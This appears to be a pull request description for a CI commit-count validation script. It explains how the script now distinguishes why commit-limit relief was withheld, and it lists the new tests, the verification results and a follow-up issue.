### Saying why relief was withheld (review round 3)

- `scripts/validation/pr_commit_count.py`: added `ReliefEvidence` and `main_merge_evidence`. Withholding relief because the branch merges nothing on the trunk and withholding it because the trunk could not be read are different problems with different owners, and `BLOCKED` named neither. One trunk read answers both, and `fetch_commit_count` emits a `::warning::` naming `refs/remotes/origin/main` and `fetch-depth: 0` when the read failed. `contains_main_merge` delegates, so the predicate is still one predicate.

### Tests

- `tests/validation/test_commit_limit_parity.py`: new. Bidirectional parity against real git repos, plus the environment controls: the same history scores differently with and without `refs/remotes/origin/main`, and the hook's trunk read must route through the hook's own runner.
- `tests/validation/test_pr_commit_count.py`: unit coverage for `main_first_parent_shas`, `contains_main_merge`, runner injection, the runner's timeout and commit-graph flags, fail-closed on timeout and missing git, `ReliefEvidence`, the CI warning, and a structural test pinning the two gates to the same timeout budget.
- `tests/ci/test_pr_validation_workflow.py`: `TestTheCommitCountGateCanReadMainsTrunk` pins `fetch-depth: 0` on the checkout that shares the gate's guard, so the infrastructure contract fails a test rather than failing silently in production.
- `tests/test_lefthook_integration.py`: test doubles for `main_first_parent_shas` updated for the injected runner.

## Verification

- 19361 tests pass, 30 skipped, 0 failed (full suite, `uv run --frozen python -m pytest tests/`).
- Ruff clean, mypy clean, `scripts/validate_workflows.py` clean, no new yamllint findings, no suppression comments added.
- Every fix is mutation-checked: reverting `fetch-depth: 0`, unhardening the runner, dropping the injected runner, shortening the timeout, or restoring the transient-vocabulary stderr each fails a specific test.
- Round-2 and round-3 claims were reproduced before they were fixed, by cloning a fixture repository the way `actions/checkout` does and scoring the same branch under both checkout shapes.

## Follow-up

- #4047: retire `contains_base_merge`, which is now dead but still importable.

## References

Fixes #3997